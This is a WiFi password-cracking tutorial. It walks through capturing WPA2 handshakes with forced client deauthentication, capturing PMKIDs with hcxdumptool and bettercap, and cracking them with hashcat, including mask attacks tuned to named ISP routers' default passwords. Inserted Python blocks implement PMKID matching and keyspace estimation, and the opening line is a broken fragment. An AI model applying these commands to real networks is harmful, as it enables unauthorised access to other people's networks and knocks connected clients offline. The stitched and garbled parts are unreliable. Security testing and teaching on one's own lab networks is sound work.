WPA/WPA2 Cracking
WPA2-PSK is the most common home WiFi security. Attacks focus on capturing the 4-way handshake or PMKID and cracking it offline.
WiFi-Specific Cracking Strategy
hashcat --stdout -a 3 ?d?d?d?d?d?d?d?d | aircrack-ng ...),
and targeted rules like best64.rule + toggles.rule.
Prefer PMKID capture over deauth — it's clientless and stealthier.
4-Way Handshake Capture
Step 1: Start capture on the target network.

```bash
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
```

Step 2: Deauthenticate a client to force reconnection. -0: deauth attack, 5: number of deauths, -a: target AP BSSID, -c: target client MAC.

```bash
# In another terminal:
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon
```

Step 3: Wait for "WPA handshake: AA:BB:CC:DD:EE:FF" in the airodump-ng status line, then verify the handshake was captured.

```bash
aircrack-ng handshake-01.cap
```

Step 4: Crack with a wordlist using aircrack-ng.

```bash
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF handshake-01.cap
```

GPU cracking with Hashcat is much faster. First, convert the capture to hashcat format.

```bash
# Option 1: Using aircrack-ng (-j writes handshake.hccapx, the legacy mode 2500 format)
aircrack-ng -j handshake handshake-01.cap
# Option 2: Using hcxpcapngtool (writes the modern mode 22000 format)
hcxpcapngtool -o handshake.hc22000 handshake-01.cap
```

Crack with hashcat using mode 22000 (WPA-PBKDF2-PMKID+EAPOL).

```bash
hashcat -m 22000 handshake.hc22000 /usr/share/wordlists/rockyou.txt
```

Use rules for better coverage.

```bash
hashcat -m 22000 handshake.hc22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rule
```

PMKID Attack (Clientless)
PMKID Attack Overview: Discovered in 2018, this attack extracts the Pairwise Master Key Identifier from the first frame of the 4-way handshake (EAPOL frame 1). No client needed, no handshake required - just association with the AP.
Why PMKID Works
The PMKID is calculated as: PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA), i.e. the first 128 bits of an HMAC-SHA1 keyed with the PMK over the fixed string "PMK Name" followed by the AP and client MAC addresses.
Since both MAC addresses (and the SSID) are visible in the capture, the only unknown is the PMK (Pairwise Master Key), which is derived from the PSK (Pre-Shared Key / WiFi password) and the SSID with PBKDF2-SHA1. Candidate passwords can therefore be tested offline until one reproduces the captured PMKID.
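The derivation carried through in Python, as an added example (not code from the page): PMK from passphrase and SSID via PBKDF2-HMAC-SHA1 with 4,096 iterations, then PMKID via HMAC-SHA1 truncated to 128 bits. The MAC addresses are constructed sample values; the "password"/"IEEE" pair is the IEEE 802.11 PSK test vector, so the PMK it prints can be checked against the standard. It shows why the only thing protecting the network is the passphrase itself: every other input is public.

```python
import hashlib
import hmac

# Fixed label from IEEE 802.11; "PMK Name" is literally this ASCII string.
PMK_NAME = b"PMK Name"


def mac_bytes(mac: str) -> bytes:
    """Turn 'aa:bb:cc:dd:ee:ff' (or 'aabbccddeeff') into the 6 raw bytes."""
    raw = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(raw) != 6:
        raise ValueError("MAC address must be 6 bytes")
    return raw


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    The SSID is the salt, which is why precomputed PMK tables (genpmk/cowpatty)
    are only valid for one SSID, and the 4,096 rounds are the per-guess cost.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def derive_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA).

    "-128" means the 160-bit HMAC-SHA1 output is truncated to its first 128 bits.
    """
    return hmac.new(pmk, PMK_NAME + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def pmkid_matches(captured_pmkid_hex: str, passphrase: str, ssid: str,
                  mac_ap: str, mac_sta: str) -> bool:
    """The check behind an offline guess: everything except the passphrase
    (SSID, both MACs, the PMKID itself) is visible in the capture."""
    pmk = derive_pmk(passphrase, ssid)
    candidate = derive_pmkid(pmk, mac_bytes(mac_ap), mac_bytes(mac_sta))
    return hmac.compare_digest(candidate.hex(), captured_pmkid_hex.lower())


if __name__ == "__main__":
    # Constructed sample MACs; "password"/"IEEE" is the IEEE 802.11 PSK test vector.
    ap, sta = "aa:bb:cc:dd:ee:ff", "cc:dd:ee:ff:00:11"
    pmk = derive_pmk("password", "IEEE")
    pmkid = derive_pmkid(pmk, mac_bytes(ap), mac_bytes(sta))
    print("PMK   :", pmk.hex())
    print("PMKID :", pmkid.hex())
    print("match :", pmkid_matches(pmkid.hex(), "password", "IEEE", ap, sta))
```

Pure Python manages only a few thousand PBKDF2 derivations per second, which is the whole point of the 4,096-iteration design; the hashcat figures further down show what dedicated GPU kernels get out of the same formula.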
Step 1: Capture PMKID with hcxdumptool (modern method).

```bash
# Install hcxdumptool and hcxtools
sudo apt install hcxdumptool hcxtools
# Capture PMKID (no separate airmon-ng step: hcxdumptool puts the interface into monitor mode itself)
sudo hcxdumptool -i wlan0 -o pmkid.pcapng --enable_status=15
# Target specific network
sudo hcxdumptool -i wlan0 -o pmkid.pcapng --filterlist_ap=targets.txt --filtermode=2
# Create targets.txt with AP MAC addresses (one per line):
# AA:BB:CC:DD:EE:FF
# 11:22:33:44:55:66
# Note: these option names are from older hcxdumptool releases; newer versions
# changed the command line, so check `hcxdumptool --help` for the installed version
```

Step 2: Extract PMKID and convert to hashcat format.
```bash
# Convert to hashcat 22000 format
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng
# Check if a PMKID was captured: PMKID entries are type 01 lines
# (type 02 lines are EAPOL handshakes)
grep "^WPA\*01" pmkid.hc22000
# Line format: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_HEX***
# (ESSID is hex-encoded; the last three fields are empty for PMKID entries)
```

Step 3: Crack PMKID with hashcat.
```bash
# Basic dictionary attack
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt
# With rules (best64)
hashcat -m 22000 pmkid.hc22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rule
# Mask attack (8 digits)
hashcat -m 22000 pmkid.hc22000 -a 3 ?d?d?d?d?d?d?d?d
# Hybrid attack (wordlist + digits)
hashcat -m 22000 pmkid.hc22000 -a 6 wordlist.txt ?d?d?d?d
# Show cracked passwords
hashcat -m 22000 pmkid.hc22000 --show
```

Alternative: Use Bettercap to trigger PMKID capture.
```bash
sudo bettercap -iface wlan0mon
# Set the output file before capturing; it is not applied retroactively
> set wifi.handshakes.file pmkid.pcap
> wifi.recon on
> wifi.show
# Associate with target AP to trigger PMKID
> wifi.assoc AA:BB:CC:DD:EE:FF
# Captured PMKID/handshake frames are written to wifi.handshakes.file
```

Advanced Cracking Techniques
Combinator Attack: Combine two wordlists.

```bash
# Combine words from two lists
hashcat -m 22000 handshake.hc22000 -a 1 wordlist1.txt wordlist2.txt
# Example: "password" + "123" = "password123"
```

Rainbow Tables: Pre-computed PMKs for common SSIDs.
```bash
# Generate rainbow table for specific SSID
genpmk -f wordlist.txt -d rainbow.db -s "SSID_NAME"
# Use cowpatty with rainbow table
cowpatty -d rainbow.db -r handshake-01.cap -s "SSID_NAME"
# Note: SSID is part of the PMK calculation, so rainbow tables
# are SSID-specific (Common SSIDs: "linksys", "default", "NETGEAR")
```

Incremental Mask Attack: Target specific password patterns.
```bash
# Format: SSID + 4 digits (common for many routers)
hashcat -m 22000 handshake.hc22000 -a 3 MyWiFi?d?d?d?d
# Year patterns (202?d covers 2020-2029)
hashcat -m 22000 handshake.hc22000 -a 3 ?l?l?l?l202?d
# Phone number patterns (XXX-XXXX)
hashcat -m 22000 handshake.hc22000 -a 3 ?d?d?d-?d?d?d?d
# Custom charset (lowercase + numbers only)
hashcat -m 22000 handshake.hc22000 -a 3 -1 ?l?d ?1?1?1?1?1?1?1?1
```

Distributed Cracking: Use multiple GPUs or cloud instances.
```bash
# Find the total keyspace first, so --skip/--limit can be sized correctly
hashcat -m 22000 handshake.hc22000 wordlist.txt --keyspace
# Instance 1: crack first 50% of keyspace (5,000,000 assumes a 10M-entry keyspace)
hashcat -m 22000 handshake.hc22000 wordlist.txt --skip=0 --limit=5000000
# Instance 2: crack second 50%
hashcat -m 22000 handshake.hc22000 wordlist.txt --skip=5000000
# Name the session so it can be resumed...
hashcat -m 22000 handshake.hc22000 wordlist.txt --session=session1
# ...and restore it if interrupted (the attack options are reloaded from the .restore file)
hashcat --session=session1 --restore
```

⚠️ PMKID Limitations
- Not all routers/APs support PMKID (patched in newer firmware)
- Roaming-enabled APs are more likely to expose a PMKID
- If PMKID fails, fall back to traditional 4-way handshake
- WPA3 (SAE) does not use PMKID
Hashcat Mode Reference
Hashcat supports multiple WiFi-related hash modes. Use the correct mode for your capture format.
| Mode | Name | Use Case | Input Format |
|---|---|---|---|
| 22000 | WPA-PBKDF2-PMKID+EAPOL | Modern unified mode — handles both PMKID and 4-way handshakes | .hc22000 (hcxpcapngtool) |
| 22001 | WPA-PMK-PMKID+EAPOL | Crack using raw PMK (skip PBKDF2) — use if you have the PMK already | .hc22000 |
| 16800 | WPA-PMKID-PBKDF2 (legacy) | PMKID-only captures — older format, superseded by 22000 | .16800 (hcxpcaptool) |
| 2500 | WPA-EAPOL-PBKDF2 (legacy) | 4-way handshake only — legacy format, use 22000 instead | .hccapx (cap2hccapx) |
| 5500 | NetNTLMv1 / MSCHAPv2 | WPA-Enterprise captured credentials (EAP-MSCHAP) | user::domain:hash |
| 5600 | NetNTLMv2 | WPA-Enterprise NTLMv2 credentials | user::domain:hash |
```bash
# Convert captures to modern format (always use 22000)
hcxpcapngtool -o output.hc22000 capture.pcapng
# Check what was extracted
head -5 output.hc22000
# WPA*01* = PMKID hash
# WPA*02* = EAPOL hash
# Legacy format conversion (if you have old .cap files)
# cap → hccapx (mode 2500, deprecated)
cap2hccapx capture.cap output.hccapx
# hccapx → hc22000 (upgrade to modern format): hcxpcapngtool's --hccapx= option only
# *writes* hccapx, so convert the old hash file back to a capture with hcxhash2cap first
hcxhash2cap --hccapx=input.hccapx -c input.pcapng
hcxpcapngtool -o output.hc22000 input.pcapng
```
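A small parser for the hc22000 lines that the conversion above produces, as an added example (not code from the page or from hcxtools). It does what the `grep "^WPA*01"` check in the PMKID section and the `head -5` check here do by hand: it splits each line into its nine `*`-separated fields, tells PMKID entries (type 01) from EAPOL entries (type 02), decodes the hex ESSID, and counts what was captured per network. The sample file is constructed, not a real capture; the hash, nonce and EAPOL hex values in it are filler.

```python
from collections import Counter
from dataclasses import dataclass

# Constructed sample file (not a real capture): one PMKID entry and one EAPOL entry
# for a network "TestNet" (hex 546573744e6574), plus a malformed line.
SAMPLE_HC22000 = """\
WPA*01*00112233445566778899aabbccddeeff*aabbccddeeff*ccddeeff0011*546573744e6574***
WPA*02*ffeeddccbbaa99887766554433221100*aabbccddeeff*ccddeeff0011*546573744e6574*\
0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef*\
0103007502010a00000000000000000001*02
not a hash line
"""

TYPE_NAMES = {"01": "PMKID", "02": "EAPOL"}


@dataclass
class Hc22000Entry:
    kind: str          # "PMKID" or "EAPOL"
    hash_hex: str      # PMKID (type 01) or EAPOL MIC (type 02)
    mac_ap: str        # colon-separated, lowercase
    mac_sta: str
    essid: str         # decoded from the hex field
    message_pair: str  # only meaningful for EAPOL entries


def fmt_mac(raw_hex: str) -> str:
    """'aabbccddeeff' -> 'aa:bb:cc:dd:ee:ff'."""
    return ":".join(raw_hex[i:i + 2] for i in range(0, 12, 2)).lower()


def parse_hc22000_line(line: str) -> Hc22000Entry:
    """Parse one line of hcxpcapngtool's -o output.

    Layout: PROTOCOL*TYPE*PMKID-or-MIC*MAC_AP*MAC_STA*ESSID_HEX*ANONCE*EAPOL*MESSAGEPAIR
    PMKID entries leave the last three fields empty.
    """
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA":
        raise ValueError(f"not a hc22000 line: {line.strip()!r}")
    _, typ, hash_hex, mac_ap, mac_sta, essid_hex, _anonce, _eapol, msg_pair = fields
    if typ not in TYPE_NAMES:
        raise ValueError(f"unknown type field {typ!r}")
    if len(hash_hex) != 32 or len(mac_ap) != 12 or len(mac_sta) != 12:
        raise ValueError("bad field lengths")
    return Hc22000Entry(TYPE_NAMES[typ], hash_hex, fmt_mac(mac_ap), fmt_mac(mac_sta),
                        bytes.fromhex(essid_hex).decode("utf-8", "replace"), msg_pair)


def summarize(text: str):
    """Return (entries, Counter keyed by (essid, mac_ap, kind), count of skipped lines)."""
    entries, skipped = [], 0
    for line in text.splitlines():
        if not line.strip():
            continue
        try:
            entries.append(parse_hc22000_line(line))
        except ValueError:
            skipped += 1
    counts = Counter((e.essid, e.mac_ap, e.kind) for e in entries)
    return entries, counts, skipped


def has_pmkid_for(text: str, mac_ap: str) -> bool:
    """The same question as the grep check: is there a type-01 line for this AP?"""
    entries, _, _ = summarize(text)
    return any(e.kind == "PMKID" and e.mac_ap == mac_ap.lower() for e in entries)


if __name__ == "__main__":
    entries, counts, skipped = summarize(SAMPLE_HC22000)
    for (essid, ap, kind), n in sorted(counts.items()):
        print(f"{essid:20} {ap}  {kind}: {n}")
    print("skipped lines:", skipped)
```

Running it over a real `.hc22000` file (read the file into `summarize`) gives a per-AP inventory, which is also a quick way to confirm, before spending GPU time, that the file holds entries for the BSSID you were authorised to test and nothing else.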
ISP Default Password Patterns
Many ISP-supplied routers use predictable default WiFi passwords. Target these patterns with mask attacks instead of generic wordlists — it's dramatically more effective.
```bash
# ==========================================
# BT Home Hub (UK) — 10 lowercase letters
# ==========================================
# Pattern: [a-z]{10} (e.g., "abcdefghij")
# Keyspace: 26^10 ≈ 141 trillion — too large for pure brute force
# Strategy: Use wordlist + BT-specific rule files
hashcat -m 22000 handshake.hc22000 -a 3 ?l?l?l?l?l?l?l?l?l?l
# Better: Use BT-specific wordlists from SecLists
# ==========================================
# Sky Broadband (UK) — 8 uppercase letters
# ==========================================
# Pattern: [A-Z]{8} (e.g., "ABCDEFGH")
# Keyspace: 26^8 ≈ 208 billion — crackable on high-end GPU
hashcat -m 22000 handshake.hc22000 -a 3 ?u?u?u?u?u?u?u?u
# ==========================================
# Virgin Media Super Hub (UK) — 8 lowercase letters
# ==========================================
hashcat -m 22000 handshake.hc22000 -a 3 ?l?l?l?l?l?l?l?l
# ==========================================
# Xfinity/Comcast (US) — "YOURSSID" + 3 digits or word+digits
# ==========================================
# Defaults often match: [word][3-4 digits]
hashcat -m 22000 handshake.hc22000 -a 6 wordlist.txt ?d?d?d?d
# ==========================================
# AT&T U-verse / BGW210 — 10 digit numeric
# ==========================================
hashcat -m 22000 handshake.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d
# ==========================================
# Spectrum (US) — 8 lowercase alphanumeric
# ==========================================
hashcat -m 22000 handshake.hc22000 -a 3 -1 ?l?d ?1?1?1?1?1?1?1?1
# ==========================================
# Deutsche Telekom Speedport (DE) — 16 hex digits
# ==========================================
hashcat -m 22000 handshake.hc22000 -a 3 -1 0123456789abcdef ?1?1?1?1?1?1?1?1?1?1?1?1?1?1?1?1
# ==========================================
# UPC/Ziggo (EU) — 8 uppercase alphanumeric (UPC prefix)
# ==========================================
# Default SSID: UPC1234567, Password: [A-Z]{8}
hashcat -m 22000 handshake.hc22000 -a 3 ?u?u?u?u?u?u?u?u
# ==========================================
# Vodafone Station (IT/DE) — 10 hex digits
# ==========================================
hashcat -m 22000 handshake.hc22000 -a 3 -1 0123456789ABCDEF ?1?1?1?1?1?1?1?1?1?1
```

GPU Cracking Performance
WPA2 uses PBKDF2-SHA1 with 4,096 iterations, making each password guess computationally expensive. Know your hardware capabilities to estimate cracking time. Below are approximate WPA2 cracking speeds (hashcat mode 22000):
| GPU | Speed (H/s) | rockyou.txt (14M) | 8-digit numeric | 8-char lowercase |
|---|---|---|---|---|
| RTX 4090 | ~2.5M H/s | ~6 seconds | ~40 seconds | ~34 hours |
| RTX 3090 | ~1.4M H/s | ~10 seconds | ~71 seconds | ~60 hours |
| RTX 3080 | ~1.0M H/s | ~14 seconds | ~100 seconds | ~84 hours |
| RTX 2080 Ti | ~680K H/s | ~21 seconds | ~2.5 minutes | ~5 days |
| GTX 1080 | ~400K H/s | ~35 seconds | ~4 minutes | ~8 days |
| Cloud (8× A100) | ~15M H/s | <1 second | ~7 seconds | ~6 hours |
| CPU (i7-12700K) | ~30K H/s | ~8 minutes | ~55 minutes | ~280 days |
Performance Tips
- Run `hashcat -b -m 22000` to benchmark your specific hardware
- NVIDIA GPUs outperform AMD for WPA2 (PBKDF2-SHA1 optimization)
- Minimum 8 GB VRAM recommended; 4 GB works but limits wordlist size
- Use `-w 3` (workload profile: high; `-w 4` is the highest, "nightmare") for maximum speed on dedicated rigs
- Multi-GPU: hashcat auto-distributes across all detected GPUs
- Cloud option: AWS p3.16xlarge (8× V100) or Vast.ai for rental GPUs
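A keyspace and time estimator for hashcat masks, as an added example (not code from the page or from hashcat). It ties the ISP default-password patterns above to the speed table: it expands the `?l`, `?u`, `?d`, `?h`/`?H`, `?s`, `?a`, `?b` built-in charsets and `-1`-style custom charsets the way hashcat does, multiplies out a mask's keyspace, divides by a hash rate from the table (or from your own `hashcat -b -m 22000` run), and also produces the `--skip`/`--limit` pairs used in the distributed-cracking section. The estimate is the ideal lower bound of keyspace divided by rate with no overhead, so real runs take longer; the 2.5M H/s rate used in the demo is the RTX 4090 figure from the table. This is the arithmetic a defender uses to judge whether a default-password scheme survives the hardware in that table.

```python
import string

# hashcat's built-in charsets (?b is the 256 raw byte values)
BUILTIN = {
    "l": string.ascii_lowercase,                                           # 26
    "u": string.ascii_uppercase,                                           # 26
    "d": string.digits,                                                    # 10
    "h": "0123456789abcdef",                                               # 16
    "H": "0123456789ABCDEF",                                               # 16
    "s": " " + string.punctuation,                                         # 33
    "a": string.ascii_letters + string.digits + " " + string.punctuation,  # 95
    "b": "".join(chr(i) for i in range(256)),                              # 256
}


def expand_charset(spec: str, custom: dict) -> str:
    """Expand a charset definition such as '?l?d' or '0123456789abcdef' into its
    unique characters, the way hashcat treats -1/-2/-3/-4 arguments."""
    out, i = [], 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            if key == "?":                       # '??' is a literal question mark
                out.append("?")
            elif key in BUILTIN:
                out.extend(BUILTIN[key])
            elif key in custom:
                out.extend(expand_charset(custom[key], custom))
            else:
                raise ValueError(f"unknown charset ?{key}")
            i += 2
        else:
            out.append(spec[i])
            i += 1
    return "".join(dict.fromkeys(out))           # dedupe, keep order


def mask_keyspace(mask: str, custom=None) -> int:
    """Number of candidates a hashcat -a 3 mask generates. Literal characters
    (e.g. 'MyWiFi' or '-') contribute a factor of 1; custom maps '1'..'4' to
    the charset definitions given with -1..-4."""
    custom = custom or {}
    total, i = 1, 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            key = mask[i + 1]
            if key != "?":
                total *= len(expand_charset(f"?{key}", custom))
            i += 2
        else:
            i += 1
    return total


def seconds_to_exhaust(keyspace: int, hashes_per_second: float) -> float:
    """Ideal time to try every candidate: keyspace / rate, no overhead."""
    return keyspace / hashes_per_second


def human_time(seconds: float) -> str:
    for unit, size in (("years", 365 * 86400), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {unit}"
    return f"{seconds:.1f} seconds"


def split_keyspace(total: int, parts: int):
    """(--skip, --limit) pairs that partition a keyspace across `parts` workers."""
    chunk, rem = divmod(total, parts)
    out, skip = [], 0
    for p in range(parts):
        limit = chunk + (1 if p < rem else 0)
        out.append((skip, limit))
        skip += limit
    return out


if __name__ == "__main__":
    rate = 2.5e6  # RTX 4090 figure from the table above, in H/s
    for mask, custom in [("?d?d?d?d?d?d?d?d", {}), ("?l?l?l?l?l?l?l?l", {}),
                         ("?u?u?u?u?u?u?u?u", {}), ("?l?l?l?l?l?l?l?l?l?l", {}),
                         ("?1?1?1?1?1?1?1?1", {"1": "?l?d"}), ("MyWiFi?d?d?d?d", {})]:
        ks = mask_keyspace(mask, custom)
        print(f"{mask:24} {ks:>20,}  {human_time(seconds_to_exhaust(ks, rate))}")
    print(split_keyspace(10_000_000, 2))
```

Feed it your own benchmark rate and the mask of a vendor's default scheme: a 10-lowercase scheme (26^10) costs years at single-GPU rates, while 8 digits or 8 uppercase letters falls in seconds to hours, which is why the patterns section treats them so differently.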
WPA Cracking Practice
Practice WPA2 handshake capture, PMKID extraction, and hashcat cracking in safe lab environments.